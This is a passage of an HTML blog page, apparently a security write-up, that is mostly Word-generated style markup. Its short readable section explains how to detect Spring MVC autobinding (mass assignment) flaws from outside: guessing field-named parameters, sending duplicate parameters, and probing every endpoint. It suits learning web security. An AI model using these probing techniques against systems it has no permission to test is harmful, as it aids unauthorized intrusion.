<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Keyboard"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Preformatted"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Sample"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Typewriter"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Variable"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Normal Table"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="annotation subject"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="No List"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Outline List 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Outline List 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Outline List 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Simple 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Simple 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Simple 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Classic 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Classic 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Classic 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Classic 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Colorful 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Colorful 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Colorful 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Columns 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Columns 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Columns 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Columns 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Columns 5"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Grid 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Grid 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Grid 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Grid 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Grid 5"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Grid 6"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Grid 7"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Grid 8"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table List 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table List 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table List 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table List 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table List 5"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table List 6"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table List 7"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table List 8"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table 3D effects 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table 3D effects 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table 3D effects 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Contemporary"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Elegant"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Professional"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Subtle 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Subtle 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Web 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Web 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Web 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Balloon Text"/>
<w:LsdException Locked="false" Priority="39" Name="Table Grid"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Theme"/>
<w:LsdException Locked="false" SemiHidden="true" Name="Placeholder Text"/>
<w:LsdException Locked="false" Priority="1" QFormat="true" Name="No Spacing"/>
<w:LsdException Locked="false" Priority="60" Name="Light Shading"/>
<w:LsdException Locked="false" Priority="61" Name="Light List"/>
<w:LsdException Locked="false" Priority="62" Name="Light Grid"/>
<w:LsdException Locked="false" Priority="63" Name="Medium Shading 1"/>
<w:LsdException Locked="false" Priority="64" Name="Medium Shading 2"/>
<w:LsdException Locked="false" Priority="65" Name="Medium List 1"/>
<w:LsdException Locked="false" Priority="66" Name="Medium List 2"/>
<w:LsdException Locked="false" Priority="67" Name="Medium Grid 1"/>
<w:LsdException Locked="false" Priority="68" Name="Medium Grid 2"/>
<w:LsdException Locked="false" Priority="69" Name="Medium Grid 3"/>
<w:LsdException Locked="false" Priority="70" Name="Dark List"/>
<w:LsdException Locked="false" Priority="71" Name="Colorful Shading"/>
<w:LsdException Locked="false" Priority="72" Name="Colorful List"/>
<w:LsdException Locked="false" Priority="73" Name="Colorful Grid"/>
<w:LsdException Locked="false" Priority="60" Name="Light Shading Accent 1"/>
<w:LsdException Locked="false" Priority="61" Name="Light List Accent 1"/>
<w:LsdException Locked="false" Priority="62" Name="Light Grid Accent 1"/>
<w:LsdException Locked="false" Priority="63" Name="Medium Shading 1 Accent 1"/>
<w:LsdException Locked="false" Priority="64" Name="Medium Shading 2 Accent 1"/>
<w:LsdException Locked="false" Priority="65" Name="Medium List 1 Accent 1"/>
<w:LsdException Locked="false" SemiHidden="true" Name="Revision"/>
<w:LsdException Locked="false" Priority="34" QFormat="true"
Name="List Paragraph"/>
<w:LsdException Locked="false" Priority="29" QFormat="true" Name="Quote"/>
<w:LsdException Locked="false" Priority="30" QFormat="true"
Name="Intense Quote"/>
<w:LsdException Locked="false" Priority="66" Name="Medium List 2 Accent 1"/>
<w:LsdException Locked="false" Priority="67" Name="Medium Grid 1 Accent 1"/>
<w:LsdException Locked="false" Priority="68" Name="Medium Grid 2 Accent 1"/>
<w:LsdException Locked="false" Priority="69" Name="Medium Grid 3 Accent 1"/>
<w:LsdException Locked="false" Priority="70" Name="Dark List Accent 1"/>
<w:LsdException Locked="false" Priority="71" Name="Colorful Shading Accent 1"/>
<w:LsdException Locked="false" Priority="72" Name="Colorful List Accent 1"/>
<w:LsdException Locked="false" Priority="73" Name="Colorful Grid Accent 1"/>
<w:LsdException Locked="false" Priority="60" Name="Light Shading Accent 2"/>
<w:LsdException Locked="false" Priority="61" Name="Light List Accent 2"/>
<w:LsdException Locked="false" Priority="62" Name="Light Grid Accent 2"/>
<w:LsdException Locked="false" Priority="63" Name="Medium Shading 1 Accent 2"/>
<w:LsdException Locked="false" Priority="64" Name="Medium Shading 2 Accent 2"/>
<w:LsdException Locked="false" Priority="65" Name="Medium List 1 Accent 2"/>
<w:LsdException Locked="false" Priority="66" Name="Medium List 2 Accent 2"/>
<w:LsdException Locked="false" Priority="67" Name="Medium Grid 1 Accent 2"/>
<w:LsdException Locked="false" Priority="68" Name="Medium Grid 2 Accent 2"/>
<w:LsdException Locked="false" Priority="69" Name="Medium Grid 3 Accent 2"/>
<w:LsdException Locked="false" Priority="70" Name="Dark List Accent 2"/>
<w:LsdException Locked="false" Priority="71" Name="Colorful Shading Accent 2"/>
<w:LsdException Locked="false" Priority="72" Name="Colorful List Accent 2"/>
<w:LsdException Locked="false" Priority="73" Name="Colorful Grid Accent 2"/>
<w:LsdException Locked="false" Priority="60" Name="Light Shading Accent 3"/>
<w:LsdException Locked="false" Priority="61" Name="Light List Accent 3"/>
<w:LsdException Locked="false" Priority="62" Name="Light Grid Accent 3"/>
<w:LsdException Locked="false" Priority="63" Name="Medium Shading 1 Accent 3"/>
<w:LsdException Locked="false" Priority="64" Name="Medium Shading 2 Accent 3"/>
<w:LsdException Locked="false" Priority="65" Name="Medium List 1 Accent 3"/>
<w:LsdException Locked="false" Priority="66" Name="Medium List 2 Accent 3"/>
<w:LsdException Locked="false" Priority="67" Name="Medium Grid 1 Accent 3"/>
<w:LsdException Locked="false" Priority="68" Name="Medium Grid 2 Accent 3"/>
<w:LsdException Locked="false" Priority="69" Name="Medium Grid 3 Accent 3"/>
<w:LsdException Locked="false" Priority="70" Name="Dark List Accent 3"/>
<w:LsdException Locked="false" Priority="71" Name="Colorful Shading Accent 3"/>
<w:LsdException Locked="false" Priority="72" Name="Colorful List Accent 3"/>
<w:LsdException Locked="false" Priority="73" Name="Colorful Grid Accent 3"/>
<w:LsdException Locked="false" Priority="60" Name="Light Shading Accent 4"/>
<w:LsdException Locked="false" Priority="61" Name="Light List Accent 4"/>
<w:LsdException Locked="false" Priority="62" Name="Light Grid Accent 4"/>
<w:LsdException Locked="false" Priority="63" Name="Medium Shading 1 Accent 4"/>
<w:LsdException Locked="false" Priority="64" Name="Medium Shading 2 Accent 4"/>
<w:LsdException Locked="false" Priority="65" Name="Medium List 1 Accent 4"/>
<w:LsdException Locked="false" Priority="66" Name="Medium List 2 Accent 4"/>
<w:LsdException Locked="false" Priority="67" Name="Medium Grid 1 Accent 4"/>
<w:LsdException Locked="false" Priority="68" Name="Medium Grid 2 Accent 4"/>
<w:LsdException Locked="false" Priority="69" Name="Medium Grid 3 Accent 4"/>
<w:LsdException Locked="false" Priority="70" Name="Dark List Accent 4"/>
<w:LsdException Locked="false" Priority="71" Name="Colorful Shading Accent 4"/>
<w:LsdException Locked="false" Priority="72" Name="Colorful List Accent 4"/>
<w:LsdException Locked="false" Priority="73" Name="Colorful Grid Accent 4"/>
<w:LsdException Locked="false" Priority="60" Name="Light Shading Accent 5"/>
<w:LsdException Locked="false" Priority="61" Name="Light List Accent 5"/>
<w:LsdException Locked="false" Priority="62" Name="Light Grid Accent 5"/>
<w:LsdException Locked="false" Priority="63" Name="Medium Shading 1 Accent 5"/>
<w:LsdException Locked="false" Priority="64" Name="Medium Shading 2 Accent 5"/>
<w:LsdException Locked="false" Priority="65" Name="Medium List 1 Accent 5"/>
<w:LsdException Locked="false" Priority="66" Name="Medium List 2 Accent 5"/>
<w:LsdException Locked="false" Priority="67" Name="Medium Grid 1 Accent 5"/>
<w:LsdException Locked="false" Priority="68" Name="Medium Grid 2 Accent 5"/>
<w:LsdException Locked="false" Priority="69" Name="Medium Grid 3 Accent 5"/>
<w:LsdException Locked="false" Priority="70" Name="Dark List Accent 5"/>
<w:LsdException Locked="false" Priority="71" Name="Colorful Shading Accent 5"/>
<w:LsdException Locked="false" Priority="72" Name="Colorful List Accent 5"/>
<w:LsdException Locked="false" Priority="73" Name="Colorful Grid Accent 5"/>
<w:LsdException Locked="false" Priority="60" Name="Light Shading Accent 6"/>
<w:LsdException Locked="false" Priority="61" Name="Light List Accent 6"/>
<w:LsdException Locked="false" Priority="62" Name="Light Grid Accent 6"/>
<w:LsdException Locked="false" Priority="63" Name="Medium Shading 1 Accent 6"/>
<w:LsdException Locked="false" Priority="64" Name="Medium Shading 2 Accent 6"/>
<w:LsdException Locked="false" Priority="65" Name="Medium List 1 Accent 6"/>
<w:LsdException Locked="false" Priority="66" Name="Medium List 2 Accent 6"/>
<w:LsdException Locked="false" Priority="67" Name="Medium Grid 1 Accent 6"/>
<w:LsdException Locked="false" Priority="68" Name="Medium Grid 2 Accent 6"/>
<w:LsdException Locked="false" Priority="69" Name="Medium Grid 3 Accent 6"/>
<w:LsdException Locked="false" Priority="70" Name="Dark List Accent 6"/>
<w:LsdException Locked="false" Priority="71" Name="Colorful Shading Accent 6"/>
<w:LsdException Locked="false" Priority="72" Name="Colorful List Accent 6"/>
<w:LsdException Locked="false" Priority="73" Name="Colorful Grid Accent 6"/>
<w:LsdException Locked="false" Priority="19" QFormat="true"
Name="Subtle Emphasis"/>
<w:LsdException Locked="false" Priority="21" QFormat="true"
Name="Intense Emphasis"/>
<w:LsdException Locked="false" Priority="31" QFormat="true"
Name="Subtle Reference"/>
<w:LsdException Locked="false" Priority="32" QFormat="true"
Name="Intense Reference"/>
<w:LsdException Locked="false" Priority="33" QFormat="true" Name="Book Title"/>
<w:LsdException Locked="false" Priority="37" SemiHidden="true"
UnhideWhenUsed="true" Name="Bibliography"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="TOC Heading"/>
<w:LsdException Locked="false" Priority="41" Name="Plain Table 1"/>
<w:LsdException Locked="false" Priority="42" Name="Plain Table 2"/>
<w:LsdException Locked="false" Priority="43" Name="Plain Table 3"/>
<w:LsdException Locked="false" Priority="44" Name="Plain Table 4"/>
<w:LsdException Locked="false" Priority="45" Name="Plain Table 5"/>
<w:LsdException Locked="false" Priority="40" Name="Grid Table Light"/>
<w:LsdException Locked="false" Priority="46" Name="Grid Table 1 Light"/>
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2"/>
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3"/>
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4"/>
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark"/>
<w:LsdException Locked="false" Priority="51" Name="Grid Table 6 Colorful"/>
<w:LsdException Locked="false" Priority="52" Name="Grid Table 7 Colorful"/>
<w:LsdException Locked="false" Priority="46"
Name="Grid Table 1 Light Accent 1"/>
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2 Accent 1"/>
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3 Accent 1"/>
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4 Accent 1"/>
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark Accent 1"/>
<w:LsdException Locked="false" Priority="51"
Name="Grid Table 6 Colorful Accent 1"/>
<w:LsdException Locked="false" Priority="52"
Name="Grid Table 7 Colorful Accent 1"/>
<w:LsdException Locked="false" Priority="46"
Name="Grid Table 1 Light Accent 2"/>
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2 Accent 2"/>
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3 Accent 2"/>
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4 Accent 2"/>
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark Accent 2"/>
<w:LsdException Locked="false" Priority="51"
Name="Grid Table 6 Colorful Accent 2"/>
<w:LsdException Locked="false" Priority="52"
Name="Grid Table 7 Colorful Accent 2"/>
<w:LsdException Locked="false" Priority="46"
Name="Grid Table 1 Light Accent 3"/>
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2 Accent 3"/>
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3 Accent 3"/>
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4 Accent 3"/>
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark Accent 3"/>
<w:LsdException Locked="false" Priority="51"
Name="Grid Table 6 Colorful Accent 3"/>
<w:LsdException Locked="false" Priority="52"
Name="Grid Table 7 Colorful Accent 3"/>
<w:LsdException Locked="false" Priority="46"
Name="Grid Table 1 Light Accent 4"/>
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2 Accent 4"/>
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3 Accent 4"/>
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4 Accent 4"/>
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark Accent 4"/>
<w:LsdException Locked="false" Priority="51"
Name="Grid Table 6 Colorful Accent 4"/>
<w:LsdException Locked="false" Priority="52"
Name="Grid Table 7 Colorful Accent 4"/>
<w:LsdException Locked="false" Priority="46"
Name="Grid Table 1 Light Accent 5"/>
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2 Accent 5"/>
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3 Accent 5"/>
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4 Accent 5"/>
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark Accent 5"/>
<w:LsdException Locked="false" Priority="51"
Name="Grid Table 6 Colorful Accent 5"/>
<w:LsdException Locked="false" Priority="52"
Name="Grid Table 7 Colorful Accent 5"/>
<w:LsdException Locked="false" Priority="46"
Name="Grid Table 1 Light Accent 6"/>
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2 Accent 6"/>
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3 Accent 6"/>
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4 Accent 6"/>
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark Accent 6"/>
<w:LsdException Locked="false" Priority="51"
Name="Grid Table 6 Colorful Accent 6"/>
<w:LsdException Locked="false" Priority="52"
Name="Grid Table 7 Colorful Accent 6"/>
<w:LsdException Locked="false" Priority="46" Name="List Table 1 Light"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark"/>
<w:LsdException Locked="false" Priority="51" Name="List Table 6 Colorful"/>
<w:LsdException Locked="false" Priority="52" Name="List Table 7 Colorful"/>
<w:LsdException Locked="false" Priority="46"
Name="List Table 1 Light Accent 1"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2 Accent 1"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3 Accent 1"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4 Accent 1"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark Accent 1"/>
<w:LsdException Locked="false" Priority="51"
Name="List Table 6 Colorful Accent 1"/>
<w:LsdException Locked="false" Priority="52"
Name="List Table 7 Colorful Accent 1"/>
<w:LsdException Locked="false" Priority="46"
Name="List Table 1 Light Accent 2"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2 Accent 2"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3 Accent 2"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4 Accent 2"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark Accent 2"/>
<w:LsdException Locked="false" Priority="51"
Name="List Table 6 Colorful Accent 2"/>
<w:LsdException Locked="false" Priority="52"
Name="List Table 7 Colorful Accent 2"/>
<w:LsdException Locked="false" Priority="46"
Name="List Table 1 Light Accent 3"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2 Accent 3"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3 Accent 3"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4 Accent 3"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark Accent 3"/>
<w:LsdException Locked="false" Priority="51"
Name="List Table 6 Colorful Accent 3"/>
<w:LsdException Locked="false" Priority="52"
Name="List Table 7 Colorful Accent 3"/>
<w:LsdException Locked="false" Priority="46"
Name="List Table 1 Light Accent 4"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2 Accent 4"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3 Accent 4"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4 Accent 4"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark Accent 4"/>
<w:LsdException Locked="false" Priority="51"
Name="List Table 6 Colorful Accent 4"/>
<w:LsdException Locked="false" Priority="52"
Name="List Table 7 Colorful Accent 4"/>
<w:LsdException Locked="false" Priority="46"
Name="List Table 1 Light Accent 5"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2 Accent 5"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3 Accent 5"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4 Accent 5"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark Accent 5"/>
<w:LsdException Locked="false" Priority="51"
Name="List Table 6 Colorful Accent 5"/>
<w:LsdException Locked="false" Priority="52"
Name="List Table 7 Colorful Accent 5"/>
<w:LsdException Locked="false" Priority="46"
Name="List Table 1 Light Accent 6"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2 Accent 6"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3 Accent 6"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4 Accent 6"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark Accent 6"/>
<w:LsdException Locked="false" Priority="51"
Name="List Table 6 Colorful Accent 6"/>
<w:LsdException Locked="false" Priority="52"
Name="List Table 7 Colorful Accent 6"/>
</w:LatentStyles>
</xml><![endif]--><!--[if gte mso 10]>
<style>
/* Style Definitions */
table.MsoNormalTable
{mso-style-name:"Table Normal";
mso-tstyle-rowband-size:0;
mso-tstyle-colband-size:0;
mso-style-noshow:yes;
mso-style-priority:99;
mso-style-parent:"";
mso-padding-alt:0cm 5.4pt 0cm 5.4pt;
mso-para-margin-top:0cm;
mso-para-margin-right:0cm;
mso-para-margin-bottom:8.0pt;
mso-para-margin-left:0cm;
line-height:107%;
mso-pagination:widow-orphan;
font-size:11.0pt;
font-family:"Calibri","sans-serif";
mso-ascii-font-family:Calibri;
mso-ascii-theme-font:minor-latin;
mso-hansi-font-family:Calibri;
mso-hansi-theme-font:minor-latin;
mso-fareast-language:EN-US;}
</style>
<![endif]-->
</span></div>
<br />
<h3 style="text-align: left;">
<span lang="EN-US" style="mso-ansi-language: EN-US;"><div class="MsoNormal">
<span lang="EN-US" style="mso-ansi-language: EN-US;">Real
Examples</span></div>
</span></h3>
<div class="MsoNormal">
<span lang="EN-US" style="mso-ansi-language: EN-US;">I was
looking for real examples of such issues on GitHub and in articles about Spring
MVC and even found some. But:</span></div>
<div class="MsoNormal">
<span lang="EN-US" style="mso-ansi-language: EN-US;">1) examples
identified on GitHub look like someone’s experiments with Spring MVC (not like real
stuff)</span></div>
<div class="MsoNormal">
<span lang="EN-US" style="mso-ansi-language: EN-US;">2) there
are some articles that recommend "dangerous" using of
@ModelAttribute, but their examples are too simple and there is no potential
impact.</span></div>
<div class="MsoNormal">
<br /></div>
<h3 class="MsoNormal" style="text-align: left;">
<span lang="EN-US" style="mso-ansi-language: EN-US;">Detection</span></h3>
<div class="MsoNormal">
<span lang="EN-US" style="mso-ansi-language: EN-US;">At first
glance, finding autobinding vulns using the "blackbox" approach looks
impossible. Nevertheless, both of tasks were solved, both autobinding vulns
were found. Respect to these people :)</span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span lang="EN-US" style="mso-ansi-language: EN-US;">There are
some things that can help us to find such type of vulns:</span></div>
<div class="MsoNormal">
<span lang="EN-US" style="mso-ansi-language: EN-US;">1) often, a
param name is equal to the name of a field of an object (but not necessary, because
it's configurable). As the fields are often named in specific way, we can
distinguish them. Of note, autobinding can be used with hashmaps and arrays.</span></div>
<div class="MsoNormal">
<span lang="EN-US" style="mso-ansi-language: EN-US;">2) When
autobinding in a controller's method is used and when we send two parameters
with the same name, the value in the object will be a concatenation of
parameters.</span></div>
<div class="MsoNormal">
<span lang="EN-US" style="mso-ansi-language: EN-US;">Example:</span></div>
<div class="MsoNormal">
<span lang="EN-US" style="mso-ansi-language: EN-US;">Request with params:</span></div>
<blockquote class="tr_bq">
<div class="MsoNormal">
<span lang="EN-US" style="mso-ansi-language: EN-US;">?name=text1&name=text2</span></div>
</blockquote>
<div class="MsoNormal">
</div>
<div class="MsoNormal">
<span lang="EN-US" style="mso-ansi-language: EN-US;">Result:</span></div>
<blockquote class="tr_bq">
<div class="MsoNormal">
<span lang="EN-US" style="mso-ansi-language: EN-US;">ObjectWithNameField.name
= text1,text2</span></div>
</blockquote>
<div class="MsoNormal">
</div>
<div class="MsoNormal">
</div>
<div class="MsoNormal">
<span lang="EN-US" style="mso-ansi-language: EN-US;">3) As soon
as we've collected all param names, we can send them to all entry points (URLs),
even to those that, at first glance, don't accept params (like resetViewQuestionHandler),
and check if replies are different or the same as without params.</span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span lang="EN-US" style="mso-ansi-language: EN-US;"><!--[if gte mso 9]><xml>
<o:OfficeDocumentSettings>
<o:AllowPNG/>
</o:OfficeDocumentSettings>
</xml><![endif]--><!--[if gte mso 9]><xml>
<w:WordDocument>
<w:View>Normal</w:View>
<w:Zoom>0</w:Zoom>
<w:TrackMoves/>
<w:TrackFormatting/>
<w:PunctuationKerning/>
<w:ValidateAgainstSchemas/>
<w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid>
<w:IgnoreMixedContent>false</w:IgnoreMixedContent>
<w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText>
<w:DoNotPromoteQF/>
<w:LidThemeOther>RU</w:LidThemeOther>
<w:LidThemeAsian>X-NONE</w:LidThemeAsian>
<w:LidThemeComplexScript>X-NONE</w:LidThemeComplexScript>
<w:Compatibility>
<w:BreakWrappedTables/>
<w:SnapToGridInCell/>
<w:WrapTextWithPunct/>
<w:UseAsianBreakRules/>
<w:DontGrowAutofit/>
<w:SplitPgBreakAndParaMark/>
<w:EnableOpenTypeKerning/>
<w:DontFlipMirrorIndents/>
<w:OverrideTableStyleHps/>
</w:Compatibility>
<m:mathPr>
<m:mathFont m:val="Cambria Math"/>
<m:brkBin m:val="before"/>
<m:brkBinSub m:val="--"/>
<m:smallFrac m:val="off"/>
<m:dispDef/>
<m:lMargin m:val="0"/>
<m:rMargin m:val="0"/>
<m:defJc m:val="centerGroup"/>
<m:wrapIndent m:val="1440"/>
<m:intLim m:val="subSup"/>
<m:naryLim m:val="undOvr"/>
</m:mathPr></w:WordDocument>
</xml><![endif]--><!--[if gte mso 9]><xml>
<w:LatentStyles DefLockedState="false" DefUnhideWhenUsed="false"
DefSemiHidden="false" DefQFormat="false" DefPriority="99"
LatentStyleCount="371">
<w:LsdException Locked="false" Priority="0" QFormat="true" Name="Normal"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 1"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="heading 2"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="heading 3"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="heading 4"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="heading 5"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="heading 6"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="heading 7"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="heading 8"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="heading 9"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 5"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 6"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 7"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 8"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 9"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 1"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 2"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 3"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 4"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 5"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 6"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 7"/>
